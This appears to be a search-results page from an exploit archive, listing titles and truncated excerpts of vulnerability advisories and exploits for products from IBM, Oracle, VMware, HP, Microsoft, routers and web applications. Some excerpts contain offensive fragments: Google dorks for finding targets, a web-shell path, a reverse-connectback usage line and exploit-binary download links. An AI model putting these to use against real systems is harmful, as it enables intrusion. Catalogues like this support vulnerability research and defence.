41207 matches found
IBM Websphere Application Server 7.0.0.13 - Cross-Site Request Forgery
IBM Websphere Application Server 7.0.0.13 - Cross-Site Request Forgery -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Core Security Technologies - CoreLabs Advisory http://corelabs.coresecurity.com/ IBM WebSphere Application Server Cross-Site Request Forgery 1. Advisory Information Title: IBM...
Oracle JD Edwards EnterpriseOne 8.9x Tools Web Runtime SEC - jdeJASMafletMafBrowserClose.mafService?jdemafjasLinkTarget Cross-Site Scripting
Oracle JD Edwards EnterpriseOne 8.9x Tools Web Runtime SEC - jdeJASMafletMafBrowserClose.mafService?jdemafjasLinkTarget Cross-Site Scripting source: https://www.securityfocus.com/bid/47479/info Oracle JD Edwards EnterpriseOne is prone to multiple cross-site scripting vulnerabilities. An attacker...
Pandora Fms 3.1 - SQL Injection
Pandora Fms 3.1 - SQL Injection + Introduction Pandora FMS for Pandora Flexible Monitoring System is a software solution for monitoring computer networks. It allows monitoring in a visual way the status and performance of several parameters from different operating systems, servers, applications...
HP LaserJet - Directory Traversal in PJL Interface
HP LaserJet - Directory Traversal in PJL Interface n.runs AG http://www.nruns.com/ securityatnruns.com n.runs-SA-2010.003 16-Nov-2010 Vendor: Hewlett-Packard, http://www.hp.com Affected Products: Various HP LaserJet MFP devices See HP advisory 3 for the complete list Vulnerability: Directory...
KDE KDELibs 4.3.3 - Remote Array Overrun
KDE KDELibs 4.3.3 - Remote Array Overrun -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 KDE KDELibs 4.3.3 Remote Array Overrun Arbitrary code execution Author: Maksymilian Arciemowicz and sp3x http://SecurityReason.com Date: - - Dis.: 07.05.2009 - - Pub.: 20.11.2009 CVE: CVE-2009-0689 Risk: High...
VMware Server 2.0.1 ESXi Server 3.5 - Directory Traversal
VMware Server 2.0.1 ESXi Server 3.5 - Directory Traversal source: https://www.securityfocus.com/bid/36842/info VMware products are prone to a directory-traversal vulnerability because they fail to sufficiently sanitize user-supplied input data. Exploiting the issue may allow an attacker to obtain...
Active PHP BookMarks 1.1.02 - SQL Injection
Active PHP BookMarks 1.1.02 - SQL Injection || | | Bookmarks V 1.1.02 id Remote SQL Injection Vulnerability | | |---------------------Hussin X----------------------| | | Author: Hussin X | | Home : www.tryag.cc/cc | | email: darkangelg85atYahooDoTcom | | | | | | script :...
Apache Tomcat 6.0.15 - Cookie Quote Handling Remote Information Disclosure
Apache Tomcat 6.0.15 - Cookie Quote Handling Remote Information Disclosure source: https://www.securityfocus.com/bid/27706/info Apache Tomcat is prone to an information-disclosure vulnerability because it fails to adequately sanitize user-supplied data. Attackers can exploit this issue to access...
S9Y Serendipity 0.x - exit.php HTTP Response Splitting
S9Y Serendipity 0.x - exit.php HTTP Response Splitting source: https://www.securityfocus.com/bid/11497/info Serendipity is reported prone to an HTTP response splitting vulnerability. A remote attacker may exploit this vulnerability to influence or misrepresent how web content is served, cached or...
SCPOnly 2.32.4 - SSH Environment Shell Escaping
SCPOnly 2.32.4 - SSH Environment Shell Escaping source: https://www.securityfocus.com/bid/5526/info scponly is a freely available, open source restricted secure copy client. It is available for Unix and Linux operating systems. The default installation of scponly does not place sufficient access...
FileSeek CGI Script - Remote Command Execution
FileSeek CGI Script - Remote Command Execution source: https://www.securityfocus.com/bid/6783/info FileSeek is an example cgi-script from "The CGI/Perl Cookbook from John Wiley & Sons". The script is written and maintained by Craig Patchett. It is mainly used to find and download files on a web...
Thrive Smart Home 1.1 - Authentication Bypass
Thrive Smart Home 1.1 - Authentication Bypass Exploit: Thrive Smart Home 1.1 - Authentication Bypass Date: 2019-12-30 Author: LiquidWorm Vendor: Thrive Product web page: http://www.thrivesmarthomes.com Affected version: 1.1 Tested on: Apache/2.4.41 centos OpenSSL/1.0.2k-fips Advisory ID:...
HomeAutomation 3.3.2 - Remote Code Execution
HomeAutomation 3.3.2 - Remote Code Execution Exploit: HomeAutomation 3.3.2 - Remote Code Execution Date: 2019-12-30 Author: LiquidWorm Vendor: Tom Rosenback and Daniel Malmgren Product web page: http://karpero.mine.nu/ha/ Affected version: 3.3.2 Tested on: Apache/2.4.41 centos OpenSSL/1.0.2k-fips...
Xfilesharing 2.5.1 - Arbitrary File Upload
Xfilesharing 2.5.1 - Arbitrary File Upload Exploit Title: Xfilesharing 2.5.1 - Arbitrary File Upload Google Dork: inurl:/?op=registration Date: 2019-11-4 Exploit Author: Noman Riffat Vendor Homepage: https://sibsoft.net/xfilesharing.html Version: Shell : http://xyz.com/cgi-bin/temp/joe/shell.php...
Intelbras Router WRN150 1.0.18 - Cross-Site Request Forgery
Intelbras Router WRN150 1.0.18 - Cross-Site Request Forgery Exploit Title: Intelbras Router WRN150 1.0.18 - Cross-Site Request Forgery Date: 2019-10-25 Exploit Author: Prof. Joas Antonio Vendor Homepage: https://www.intelbras.com/pt-br/ Software Link: http://en.intelbras.com.br/node/25896 Version...
IBM Bigfix Platform 9.5.9.62 - Arbitrary File Upload
IBM Bigfix Platform 9.5.9.62 - Arbitrary File Upload Exploit Title: IBM Bigfix Platform 9.5.9.62 - Arbitrary File Upload Date: 2018-12-11 Exploit Authors: Jakub Palaczynski Vendor Homepage: https://www.ibm.com/ Version: IBM Bigfix Platform Software Add Software" menu. Here user needs to choose...
Western Digital My Book World II NAS 1.02.12 - Authentication Bypass Command Execution
Western Digital My Book World II NAS 1.02.12 - Authentication Bypass Command Execution Exploit Title: Western Digital My Book World II NAS = 1.02.12 - Broken Authentication to RCE Google Dork: intitle:"My Book World Edition - MyBookWorld" Date: 19th Sep, 2019 Exploit Author: Noman Riffat, Nationa...
1CRM On-Premise Software 8.5.7 - Persistent Cross-Site Scripting
1CRM On-Premise Software 8.5.7 - Persistent Cross-Site Scripting 1CRM On-Premise Software 8.5.7 Stored XSS //////////////////////////////////////////////////////////////////////////////////// Exploit Title: 1CRM On-Premise Software 8.5.7 - Cross-Site Scripting Date: 19/07/2019 Exploit Author: Kus...
Microsoft DirectWrite AFDKO - Stack Corruption in OpenType Font Handling Due to Incorrect Handling of blendArray
Microsoft DirectWrite AFDKO - Stack Corruption in OpenType Font Handling Due to Incorrect Handling of blendArray -----===== Background =====----- AFDKO Adobe Font Development Kit for OpenType is a set of tools for examining, modifying and building fonts. The core part of this toolset is a font...
VMware WorkStation 12.5.3 - Virtual Machine Escape
VMware WorkStation 12.5.3 - Virtual Machine Escape VMware Escape Exploit VMware Escape Exploit before VMware WorkStation 12.5.3 Host Target: Win10 x64 Compiler: VS2013 Test on VMware 12.5.2 build-4638234 Known issues Failing to heap manipulation causes host process crash. About 50% successful rat...
AjentiCP 1.2.23.13 - Cross-Site Scripting
AjentiCP 1.2.23.13 - Cross-Site Scripting Title: AjentiCP 1.2.23.13 - Cross-Site Scripting Author: Numan OZDEMIR https://infinitumit.com.tr Vendor Homepage: ajenti.org Software Link: https://github.com/ajenti/ajenti Version: Up to v1.2.23.13 CVE: CVE-2018-18548 Description: Attacker can inject...
Easylogin Pro 1.3.0 - Encryptor.php Unserialize Remote Code Execution
Easylogin Pro 1.3.0 - Encryptor.php Unserialize Remote Code Execution !/usr/bin/php -c -t: target server ip with or without port -c: connectback server ip and port Example: php ./e.php -t 172.16.175.136 -c 172.16.175.137:1337 ---------------------------------------------------- mrme@pluto:$ ./e.p...
Schneider Electric PLCs - Cross-Site Request Forgery
Schneider Electric PLCs - Cross-Site Request Forgery Exploit Title: Schneider Electric PLCs - Cross-Site Request Forgery Date: 2018-05-12 Exploit Author: t4rkd3vilz Vendor Homepage: http://www.schneider-electric.com/ Tested on: Windows CVE: CVE-2013-0663 Version: Schneider Electric Quantum PLC:...
libmad 0.15.1b - mp3 Memory Corruption
libmad 0.15.1b - mp3 Memory Corruption libmad memory corruption vulnerability ================ Author : qflb.wu =============== Introduction: ============= libmad is a high-quality MPEG audio decoder capable of 24-bit output. Affected version: ===== 0.15.1b Vulnerability Description:...
Oracle PeopleSoft - PeopleSoftServiceListeningConnector XML External Entity via DOCTYPE
Oracle PeopleSoft - PeopleSoftServiceListeningConnector XML External Entity via DOCTYPE Application: Oracle PeopleSoft Versions Affected: PeopleSoft HCM 9.2 on PeopleTools 8.55 Vendor URL: http://oracle.com Bug: XXE Reported: 23.12.2016 Vendor response: 24.12.2016 Date of Public Advisory:...
Miele Professional PG 8528 - Directory Traversal
Miele Professional PG 8528 - Directory Traversal Title: ====== Miele Professional PG 8528 - Web Server Directory Traversal Author: ======= Jens Regel, Schneider & Wulf EDV-Beratung GmbH & Co. KG CVE-ID: ======= CVE-2017-7240 Risk Information: ================= Risk Factor: Medium CVSS Base Score:...
Apple macOS 10.12 16A323 XNU Kernel iOS 10.1.1 - set_dp_control_port Lack of Locking Use-After-Free
Apple macOS 10.12 16A323 XNU Kernel iOS 10.1.1 - setdpcontrolport Lack of Locking Use-After-Free Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=965 setdpcontrolport is a MIG method on the hostprivport so this bug is a root-kernel escalation. kernreturnt setdpcontrolport hostpri...
SweetRice 1.5.1 - Arbitrary File Upload
SweetRice 1.5.1 - Arbitrary File Upload /usr/bin/python -- Coding: utf-8 -- Exploit Title: SweetRice 1.5.1 - Unrestricted File Upload Exploit Author: Ashiyane Digital Security Team Date: 03-11-2016 Vendor: http://www.basic-cms.org/ Software Link:...
Gallery 2 2.0.2 - Multiple Vulnerabilities
Gallery 2 2.0.2 - Multiple Vulnerabilities Gallery 2 Multiple Vulnerabilities Vendor: Bharat Mediratta Product: Gallery 2 Version: = 2.0.2 Website: http://gallery.menalto.com/ BID: 16940 CVE: CVE-2006-1127 CVE-2006-1128 OSVDB: 23596 23597 SECUNIA: 19104 PACKETSTORM: 44358 Description: Gallery2, t...
8 TOTOLINK Router Models - Backdoor Access Remote Code Execution
8 TOTOLINK Router Models - Backdoor Access Remote Code Execution Advisory Information Title: Backdoor and RCE found in 8 TOTOLINK router models Advisory URL: https://pierrekim.github.io/advisories/2015-totolink-0x02.txt Blog URL:...
PHPXMLRPC 1.1 - Remote Code Execution
PHPXMLRPC 1.1 - Remote Code Execution PHPXMLRPC Remote Code Execution Vendor: Useful Information Inc. Product: PHPXMLRPC Version: = 1.1 Website: http://phpxmlrpc.sourceforge.net/ BID: 14088 CVE: CVE-2005-1921 OSVDB: 17793 SECUNIA: 15852 PACKETSTORM: 38394 Description: PHPXMLRPC aka XML-RPC For PH...
Apple Mac OSX - Local Denial of Service
Apple Mac OSX - Local Denial of Service / 2015, Maxime Villard, CVE-2015-1100 Local DoS caused by a missing limit check in the fat loader of the Mac OS X Kernel. $ gcc -o Mac-OS-XFat-DoS Mac-OS-XFat-DoS.c $ ./Mac-OS-XFat-DoS BINARY-NAME Obtained from: http://m00nbsd.net/garbage/Mac-OS-XFat-DoS.c...
NetIQ Access Manager 4.0 SP1 - Multiple Vulnerabilities
NetIQ Access Manager 4.0 SP1 - Multiple Vulnerabilities SEC Consult Vulnerability Lab Security Advisory ======================================================================= title: Multiple high risk vulnerabilities product: NetIQ Access Manager vulnerable version: 4.0 SP1 fixed version: 4.0 SP...
Microsoft Windows - OLE Package Manager SandWorm
Microsoft Windows - OLE Package Manager SandWorm !/usr/bin/env python import os import zipfile import sys ''' Full Exploit: https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/35019.tar.gz Very quick and ugly SandWorm CVE-2014-4114 exploit builder Exploit Title:...
osCommerce 2.3.4 - Multiple Vulnerabilities
osCommerce 2.3.4 - Multiple Vulnerabilities Title: osCommerce 2.3.4 - Multiple vulnerabilities Date: 10.07.14 Affected versions: = 2.3.4 latest atm Vendor: oscommerce.com Tested on: Apache 2.2.22 at Debian Contact: smash at devilteam.pl Cross Site Scripting 1. Reflected XSS - Send Email Vulnerabl...
Exponent CMS 2.2.0 Beta 3 - Multiple Vulnerabilities
Exponent CMS 2.2.0 Beta 3 - Multiple Vulnerabilities Advisory ID: HTB23154 Product: Exponent CMS Vendor: Online Innovative Creations Vulnerable Versions: 2.2.0 beta 3 and probably prior Tested Version: 2.2.0 beta 3 Vendor Notification: April 24, 2013 Vendor Patch: May 3, 2013 Public Disclosure: M...
XOOPS 2.5.4 - Multiple Cross-Site Scripting Vulnerabilities
XOOPS 2.5.4 - Multiple Cross-Site Scripting Vulnerabilities Advisory ID: HTB23062 Product: XOOPS Vendor: xoops.org Vulnerable Versions: 2.5.4 and probably prior Tested Version: 2.5.4 Vendor Notification: 7 December 2011 Vendor Patch: 22 February 2012 Public Disclosure: 18 April 2012 Vulnerability...
IBM Websphere ILOG JRules 6.7 - Cross-Site Scripting
IBM Websphere ILOG JRules 6.7 - Cross-Site Scripting source: https://www.securityfocus.com/bid/41030/info IBM WebSphere ILOG JRules is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input. An attacker may leverage this issue to execute arbitrary...
Microsoft Windows Outlook Express and Windows Mail - Integer Overflow
Microsoft Windows Outlook Express and Windows Mail - Integer Overflow Application: Microsoft Outlook Express Microsoft Windows Mail Platforms: Windows 2000 Windows XP Windows Vista Windows server 2003 Windows Server 2008 SR2 Exploitation: Remote Exploitable CVE Number: CVE-2010-0816 Discover Date...
HP OpenView Network Node Manager (OV NNM) 7.53 - Invalid DB Error Code
HP OpenView Network Node Manager OV NNM 7.53 - Invalid DB Error Code -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Core Security Technologies - CoreLabs Advisory http://www.coresecurity.com/corelabs/ HP Openview NNM 7.53 Invalid DB Error Code vulnerability 1. Advisory Information Title: HP Openvi...
Pligg 9.9.5b - Arbitrary File Upload SQL Injection
Pligg 9.9.5b - Arbitrary File Upload SQL Injection !/usr/bin/perl =about Pligg 9.9.5 Beta Perl exploit AUTHOR discovered & written by Ams ax330d doggy gmail dot com VULN. DESCRIPTION: Vulnerability hides in 'evb/checkurl.php' unfiltered $GET'url' parameter. Actually, it has filtration. Filtration...
Arab Portal 2.1 (Windows) - Remote File Disclosure
Arab Portal 2.1 Windows - Remote File Disclosure Arab Portal v2.1 Remote File Disclosure Win32 AUTHOR : IRCRASH R3d.W0rm Sina Yazdanmehr Discovered by : R3d.W0rm Sina Yazdanmehr Our Site : Http://IRCRASH.COM IRCRASH Team Members : Dr.Crash - R3d.w0rm Sina Yazdanmehr - Hadi Kiamarsi Download :...
phpBB Fishing Cat Portal Addon - functions_portal.php Remote File Inclusion
phpBB Fishing Cat Portal Addon - functionsportal.php Remote File Inclusion source: https://www.securityfocus.com/bid/28708/info Fishing Cat Portal Addon for phpBB is prone to a remote file-include vulnerability because it fails to sufficiently sanitize user-supplied data. Exploiting this issue ca...
XMPlay 3.3.0.4 - .ASX Filename Local Buffer Overflow
XMPlay 3.3.0.4 - .ASX Filename Local Buffer Overflow / =================================================================== 0-day XMPlay 3.3.0.4 .ASX Filename Buffer Overflow Exploit =================================================================== XMPlay 3.3.0.4 and lower experiance a stack-bas...
BrudaGB 1.1 - adminindex.php Remote File Inclusion
BrudaGB 1.1 - adminindex.php Remote File Inclusion ============================================================================================== BrudaGB ================================================================================================ Exploit : --------------------------------...
Linux Kernel 2.6.x - IPv6 Local Denial of Service
Linux Kernel 2.6.x - IPv6 Local Denial of Service / source: https://www.securityfocus.com/bid/15156/info Linux Kernel is reported prone to a local denial-of-service vulnerability. This issue arises from an infinite loop when binding IPv6 UDP ports. / / Linux kernel IPv6 UDP port selection infinit...
PANDORAFMS 7.0 - Authenticated Remote Code Execution
PANDORAFMS 7.0 - Authenticated Remote Code Execution Exploit Title: PANDORAFMS 7.0 - Authenticated Remote Code Execution Date: 2020-02-12 Exploit Author: Engin Demirbilek Vendor homepage: http://pandorafms.org/ Version: 7.0 Software link:...
Remote Desktop Gateway - BlueGate Denial of Service (PoC)
Remote Desktop Gateway - BlueGate Denial of Service PoC include "BlueGate.h" / EDB Note: - Download Binary https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/47964-1.exe - Download Source...
Windows - Shell COM Server Registrar Local Privilege Escalation
Windows - Shell COM Server Registrar Local Privilege Escalation // Axel '0vercl0k' Souchet - December 28 2019 // References: // - Found by an anonymous researcher, written up by Simon '@HexKitchen' Zuckerbraun // -...
Technicolor TD5130.2 - Remote Command Execution
Technicolor TD5130.2 - Remote Command Execution Exploit Title: Technicolor TD5130.2 - Remote Command Execution Date: 2019-11-12 Exploit Author: João Teles Vendor Homepage: https://www.technicolor.com/ Version: TD5130v2 Firmware Version: OIFwV20 CVE : CVE-2019-18396 --------------------------- POS...